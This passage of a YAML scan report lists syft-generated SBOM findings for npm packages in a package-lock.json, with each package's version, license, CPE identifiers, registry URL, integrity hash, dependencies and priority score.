- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 56bdc5dcaf0f0066
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: https-proxy-agent 7.0.6'
|
|
title: https-proxy-agent 7.0.6
|
|
description: 'Package discovered: https-proxy-agent 7.0.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2d10e944bb8687bf
|
|
name: https-proxy-agent
|
|
version: 7.0.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:7.0.6:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/https-proxy-agent@7.0.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz
|
|
integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==
|
|
dependencies:
|
|
agent-base: ^7.1.2
|
|
debug: '4'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: eedb1c984540056e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: hyphen 1.14.1'
|
|
title: hyphen 1.14.1
|
|
description: 'Package discovered: hyphen 1.14.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0cfa30ecdd760351
|
|
name: hyphen
|
|
version: 1.14.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:hyphen:hyphen:1.14.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/hyphen@1.14.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/hyphen/-/hyphen-1.14.1.tgz
|
|
integrity: sha512-kvL8xYl5QMTh+LwohVN72ciOxC0OEV79IPdJSTwEXok9y9QHebXGdFgrED4sWfiax/ODx++CAMk3hMy4XPJPOw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 233f854a4d966408
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: iconv-lite 0.4.24'
|
|
title: iconv-lite 0.4.24
|
|
description: 'Package discovered: iconv-lite 0.4.24'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3ce09826a837d25b
|
|
name: iconv-lite
|
|
version: 0.4.24
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:iconv-lite:iconv-lite:0.4.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:iconv-lite:iconv_lite:0.4.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:iconv_lite:iconv-lite:0.4.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:iconv_lite:iconv_lite:0.4.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:iconv:iconv-lite:0.4.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:iconv:iconv_lite:0.4.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/iconv-lite@0.4.24
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz
|
|
integrity: sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==
|
|
dependencies:
|
|
safer-buffer: '>= 2.1.2 < 3'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a2d6f15d605131f9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: inherits 2.0.4'
|
|
title: inherits 2.0.4
|
|
description: 'Package discovered: inherits 2.0.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 911374ff7f37ba7f
|
|
name: inherits
|
|
version: 2.0.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:inherits:inherits:2.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/inherits@2.0.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz
|
|
integrity: sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6970e7e10ca27673
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ini 1.3.8'
|
|
title: ini 1.3.8
|
|
description: 'Package discovered: ini 1.3.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 29aeb86d59c0f085
|
|
name: ini
|
|
version: 1.3.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ini_project:ini:1.3.8:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/ini@1.3.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ini/-/ini-1.3.8.tgz
|
|
integrity: sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9c64ace1b439e4fe
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: internmap 2.0.3'
|
|
title: internmap 2.0.3
|
|
description: 'Package discovered: internmap 2.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: da7b570ddddf2064
|
|
name: internmap
|
|
version: 2.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:internmap:internmap:2.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/internmap@2.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/internmap/-/internmap-2.0.3.tgz
|
|
integrity: sha512-5Hh7Y1wQbvY5ooGgPbDaL5iYLAPzMTUrjMulskHLH6wnv/A+1q5rgEaiuqEjB+oxGXIVZs1FF+R/KPN3ZSQYYg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f4c9c2133d427419
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ioredis 5.10.1'
|
|
title: ioredis 5.10.1
|
|
description: 'Package discovered: ioredis 5.10.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0c5e141c3ee662a0
|
|
name: ioredis
|
|
version: 5.10.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ioredis:ioredis:5.10.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/ioredis@5.10.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ioredis/-/ioredis-5.10.1.tgz
|
|
integrity: sha512-HuEDBTI70aYdx1v6U97SbNx9F1+svQKBDo30o0b9fw055LMepzpOOd0Ccg9Q6tbqmBSJaMuY0fB7yw9/vjBYCA==
|
|
dependencies:
|
|
'@ioredis/commands': 1.5.1
|
|
cluster-key-slot: ^1.1.0
|
|
debug: ^4.3.4
|
|
denque: ^2.1.0
|
|
lodash.defaults: ^4.2.0
|
|
lodash.isarguments: ^3.1.0
|
|
redis-errors: ^1.2.0
|
|
redis-parser: ^3.0.0
|
|
standard-as-callback: ^2.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: af1cc3d21ce4d415
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ip-address 10.2.0'
|
|
title: ip-address 10.2.0
|
|
description: 'Package discovered: ip-address 10.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 25abf70855373b85
|
|
name: ip-address
|
|
version: 10.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ip-address:ip-address:10.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ip-address:ip_address:10.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ip_address:ip-address:10.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ip_address:ip_address:10.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ip:ip-address:10.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ip:ip_address:10.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/ip-address@10.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ip-address/-/ip-address-10.2.0.tgz
|
|
integrity: sha512-/+S6j4E9AHvW9SWMSEY9Xfy66O5PWvVEJ08O0y5JGyEKQpojb0K0GKpz/v5HJ/G0vi3D2sjGK78119oXZeE0qA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5ea31e6ac67f4d75
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ipaddr.js 1.9.1'
|
|
title: ipaddr.js 1.9.1
|
|
description: 'Package discovered: ipaddr.js 1.9.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c7a7f0ed243b0857
|
|
name: ipaddr.js
|
|
version: 1.9.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ipaddr.js:ipaddr.js:1.9.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/ipaddr.js@1.9.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz
|
|
integrity: sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fae14e02f5662aa3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: is-arrayish 0.3.4'
|
|
title: is-arrayish 0.3.4
|
|
description: 'Package discovered: is-arrayish 0.3.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 88ac3450fc3712b8
|
|
name: is-arrayish
|
|
version: 0.3.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:is-arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is-arrayish:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is_arrayish:0.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/is-arrayish@0.3.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.3.4.tgz
|
|
integrity: sha512-m6UrgzFVUYawGBh1dUsWR5M2Clqic9RVXC/9f8ceNlv2IcO9j9J/z8UoCLPqtsPBFNzEpfR3xftohbfqDx8EQA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f590fee2d4fea15c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: is-binary-path 2.1.0'
|
|
title: is-binary-path 2.1.0
|
|
description: 'Package discovered: is-binary-path 2.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 12d3bfff6ef69b2c
|
|
name: is-binary-path
|
|
version: 2.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:is-binary-path:is-binary-path:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-binary-path:is_binary_path:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_binary_path:is-binary-path:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_binary_path:is_binary_path:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-binary:is-binary-path:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-binary:is_binary_path:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_binary:is-binary-path:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_binary:is_binary_path:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is-binary-path:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is_binary_path:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/is-binary-path@2.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz
|
|
integrity: sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==
|
|
dependencies:
|
|
binary-extensions: ^2.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3e8a78c5009c1819
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: is-core-module 2.16.1'
|
|
title: is-core-module 2.16.1
|
|
description: 'Package discovered: is-core-module 2.16.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9f592f96ab7392ec
|
|
name: is-core-module
|
|
version: 2.16.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:is-core-module:is-core-module:2.16.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-core-module:is_core_module:2.16.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_core_module:is-core-module:2.16.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_core_module:is_core_module:2.16.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-core:is-core-module:2.16.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is-core:is_core_module:2.16.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_core:is-core-module:2.16.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is_core:is_core_module:2.16.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is-core-module:2.16.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:is:is_core_module:2.16.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/is-core-module@2.16.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/is-core-module/-/is-core-module-2.16.1.tgz
|
|
integrity: sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w==
|
|
dependencies:
|
|
hasown: ^2.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
